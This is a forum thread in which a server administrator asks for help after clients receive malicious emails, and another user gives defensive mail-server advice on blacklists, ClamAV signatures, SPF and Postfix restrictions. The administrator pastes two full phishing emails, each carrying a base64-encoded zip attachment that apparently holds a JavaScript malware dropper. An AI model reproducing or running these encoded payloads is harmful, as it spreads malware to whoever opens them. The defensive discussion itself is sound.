Hello, All of my clients are getting malicious emails sent from my server. I have never dealt with anything like this, I already contacted them adn explained the situation. One of them is infected and can't use his computer anymore. It is about a debian 7 perfect ispconfig server with apache from the tutorials. What are the apropriate steps? I already have a new server spinned up to move everything, but I don't want it getting infected as well. I am literally panicking... Thanks.
First thing you'll want to identify where the emails are coming from, for which you look at the (full) headers in the email messages and your mail log file. You say they are "from your server," what exactly do you mean by that? If they are sent through an email account on your server you may just need to change passwords on the account. If they originate from your server but are unauthenticated, it's quite possible they come through a website. Check your web server logs to try to identify such requests; eg. see if the originating ip addr is in the email headers and search for it, or simply search for the time range the messages were sent. Once you can identify the website(s) affected, you can then find the specific script(s) which are being exploited, and start looking into what's needed to fix it, which might be as simple as updating software (eg. wordpress core/plugins/themes). There are tools to help your search here, eg. maldet and ispprotect are 2 that come to mind. If you find strange scripts which shouldn't be there sending email, probably the entire website is compromised and you should approach it as such (change passwords, clean up the site, update software, etc.). If you simply meant your server is the mail server through which your client received an infected mail (ie. unauthenticated mail originating from the internet), you can try to improve your mail filtering/virus scanning. There's quite a bit which can be done (and it's a complex topic), though in the end it's an arms race against those sending that stuff, so is never perfect (in some environments user education can certainly help). Some things to try: look at adding move virus scanning signatures, and/or additional scanners; update to current software if your server is old; block obviously malicious file types/attachments, and even less obvious ones if your environment allows it; utilize blacklists/whitelists in both your mail system and firewalls; look at rescanning already delivered mail at later dates so new malware which slips through gets caught later on (if the mail isn't already downloaded....). See what you find with that and post back as you walk through it, there are quite a few helpful folks here.
Hello, Thank you for your help I suspect they were coming from sites, with ispprotect I was able to find some malicious code on different websites which I deleted. (I didn't use those sites anymore as they were from old clients) I checked with maldet and it didn't find anything. Once I am certain the rest is clean, I will move every site to a new server. (I had some trouble upgrading this one to jessie in the past) Below is the source of one of the emails I had. It displays like it came from my mailbox. Maybe you see more than I do... Code: Return-Path: <[email protected]> X-Original-To: [email protected] Delivered-To: [email protected] Received: from localhost (localhost [127.0.0.1]) by server1.lswebs.net (Postfix) with ESMTP id 2E08E40A4AB for <[email protected]>; Thu, 24 Mar 2016 15:26:55 +0100 (CET) X-Virus-Scanned: Debian amavisd-new at server1.lswebs.nl X-Amavis-Alert: BAD HEADER SECTION, MIME error: error: part did not end with expected boundary Received: from server1.lswebs.net ([127.0.0.1]) by localhost (server1.lswebs.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id aRWfQTluM8ct for <[email protected]>; Thu, 24 Mar 2016 15:26:54 +0100 (CET) Received: from 82.186-71-150.uio.satnet.net (unknown [186.71.150.82]) by server1.lswebs.net (Postfix) with ESMTP id CBD4A40A4A3 for <[email protected]>; Thu, 24 Mar 2016 15:26:53 +0100 (CET) From: <[email protected]> To: <[email protected]> Subject: Document2 Thread-Topic: Document2 Thread-Index: AdF+sJZYKtxaTvOhSFC+rMKD/CUwyg== Date: Thu, 24 Mar 2016 09:26:53 -0500 Message-ID: <[email protected]> Accept-Language: en-GB, en-US Content-Language: en-US X-MS-Has-Attach: yes X-MS-TNEF-Correlator: x-originating-ip: [192.168.0.28] Content-Type: multipart/mixed; boundary="_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_" MIME-Version: 1.0 --_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_ Content-Type: multipart/alternative; boundary="_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_" --_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable --_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_ Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" xmlns:w=3D"urn:sc= hemas-microsoft-com:office:word" xmlns:m=3D"http://schemas.microsoft.com/of= fice/2004/12/omml" xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dus-ascii"= > <meta name=3D"Generator" content=3D"Microsoft Word 14 (filtered medium)"> <style><!-- /* Font Definitions */ @font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-fareast-language:EN-US;} a:link, span.MsoHyperlink {mso-style-priority:99; color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {mso-style-priority:99; color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:"Calibri","sans-serif"; color:windowtext;} .MsoChpDefault {mso-style-type:export-only; font-family:"Calibri","sans-serif"; mso-fareast-language:EN-US;} @page WordSection1 {size:612.0pt 792.0pt; margin:72.0pt 72.0pt 72.0pt 72.0pt;} div.WordSection1 {page:WordSection1;} --></style> </head> <body lang=3D"EN-GB" link=3D"blue" vlink=3D"purple"> <div class=3D"WordSection1"> <p class=3D"MsoNormal"><o:p> </o:p></p> </div> </body> </html> --_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_-- --_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_ Content-Type: application/zip; name="Document2.zip" Content-Description: Document2.zip Content-Disposition: attachment; filename="Document2.zip"; Content-Transfer-Encoding: base64 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 Tg8AAAAA --_009_02A7D35DF447A24E8CA110F51FF16CDD57055CDAUZNA89buhlerltd_--
This is another source of email I got, it uses a non existing mailbox. Code: Return-Path: <[email protected]> X-Original-To: [email protected] Delivered-To: [email protected] Received: from localhost (localhost [127.0.0.1]) by server1.lswebs.net (Postfix) with ESMTP id B46784027BA for <[email protected]>; Mon, 28 Mar 2016 16:19:00 +0200 (CEST) X-Virus-Scanned: Debian amavisd-new at server1.lswebs.nl Received: from server1.lswebs.net ([127.0.0.1]) by localhost (server1.lswebs.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 08uZa3twZWQ9 for <[email protected]>; Mon, 28 Mar 2016 16:18:59 +0200 (CEST) Received: from [180.149.210.18] (unknown [180.149.210.18]) by server1.lswebs.net (Postfix) with ESMTP id 623A8402793 for <[email protected]>; Mon, 28 Mar 2016 16:18:59 +0200 (CEST) From: "netadmin" <[email protected]> To: "[email protected]" <[email protected]> Subject: Document (1).pdf Date: Mon, 28 Mar 2016 19:18:58 +0500 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0042_01D0A1F9.171F24B0" X-Mailer: Microsoft Outlook 14.0 Thread-Index: AdCh6FNHn/LWax1JSTSc7XL2c2t2TQ== Content-Language: en-US This is a multipart message in MIME format. ------=_NextPart_000_0042_01D0A1F9.171F24B0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Document (1).pdf ------=_NextPart_000_0042_01D0A1F9.171F24B0 Content-Type: application/zip; name="Document (1).zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Document (1).zip" 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 ------=_NextPart_000_0042_01D0A1F9.171F24B0--
I checked the last mail in the log and this is what it says: Code: Mar 28 16:18:59 server1 postfix/smtpd[19539]: connect from unknown[180.149.210.18] Mar 28 16:18:59 server1 postfix/smtpd[19539]: 623A8402793: client=unknown[180.149.210.18] Mar 28 16:18:59 server1 postfix/cleanup[20138]: 623A8402793: message-id=<[email protected]> Mar 28 16:18:59 server1 postfix/qmgr[5096]: 623A8402793: from=<[email protected]>, size=5204, nrcpt=1 (queue active) Mar 28 16:18:59 server1 postfix/smtpd[19539]: disconnect from unknown[180.149.210.18]
Those both appear to be unauthenticated mail coming from the internet, not compromised websites that you host. Do you use sanesecurity rules? (http://sanesecurity.com/) Clamav rules out of the box are quite inadequate. There are several other virus scanners for linux as well which you could look at using in combination. Some places can get away with blocking .zip files entirely, which would stop these in particular. Most places can't, but you can probably block .exe and friends if you don't already. These 2 sending ip addrs are one quite a few blacklists at this point. They may not have been when the messages were sent, but make sure you're utilizing some rbls: http://www.anti-abuse.org/multi-rbl-check-results/?host=186.71.150.82 http://www.anti-abuse.org/multi-rbl-check-results/?host=180.149.210.18 This catches quite a few that slip by at first, and is worth looking at. One other suggestion is to limit who can send mail claiming to be from your domain. Look at a hard fail SPF policy for larsvansante.nl, and get familiar with the options you have in postfix sender restrictions (http://www.postfix.org/postconf.5.html#smtpd_sender_restrictions) - add reject_sender_login_mismatch and reject_unlisted_sender to help with the two samples above, but it does have implications for everyone using your server (test it with warn_if_reject first if needed).
Thank you so much! I added the sender restrictions you defined which did not help, I Didn't find any good tutorial for the sane check yet, but the blacklists definatly work! No spam since then. Could you tell me if this hardening guide still applies to debian jessie? https://www.howtoforge.com/hardening-postfix-for-ispconfig-3 I will go through all of it on my new server.
What is your smtpd_sender_restrictions set to? For debian the easiest way is install the clamav-unofficial-sigs package: Code: apt-get install clamav-unofficial-sigs -y That will download a default set of sanesecurity signatures, as well as some from other sources. There are more sanesecurity signatures to consider though, see http://sanesecurity.com/usage/signatures/ for available signature databases and their FP likelihood. A quick look at the debian readme shows how to override settings for clamav-unofficial-sigs: Code: zless /usr/share/doc/clamav-unofficial-sigs/README.Debian.gz As an example, to add the badmacro signatures copy the ss_dbs= section from /usr/share/clamav-unofficial-sigs/conf.d/00-clamav-unofficial-sigs.conf to a custom conf file: Code: sed -n '/^ss_dbs=/,$p' /usr/share/clamav-unofficial-sigs/conf.d/00-clamav-unofficial-sigs.conf | sed '/^$/,$d' > /etc/clamav-unofficial-sigs.conf.d/sanesecurity.conf Then add badmacro.ndb to that list with your text editor or: Code: echo 'ss_dbs="${ss_dbs} badmacro.ndb"' >>/etc/clamav-unofficial-sigs.conf.d/sanesecurity.conf Then wait for the next hourly cronjob, or run clamav-unofficial-sigs manually to download that: Code: sudo -u clamav /usr/sbin/clamav-unofficial-sigs For the most part, yes, that would apply to jessie. Depending on your time frame, ispconfig 3.1 will have better postfix config out of the box. If https://git.ispconfig.org/ispconfig/ispconfig3/merge_requests/279 is accepted, skip the entirety of the 'Postfix main.cf' section in that hardening guide and go with ispconfig defaults. Use the the ispconfig interface to configure the blacklists (DNSBL section). Postscreen is a good tool (if you can use it, eg. if you require all your clients to send on port 587), but the postscreen section there is pretty incomplete, though would work as a first step. The SPF info and greylisting info would apply (though you might skip greylisting if you use postscreen).
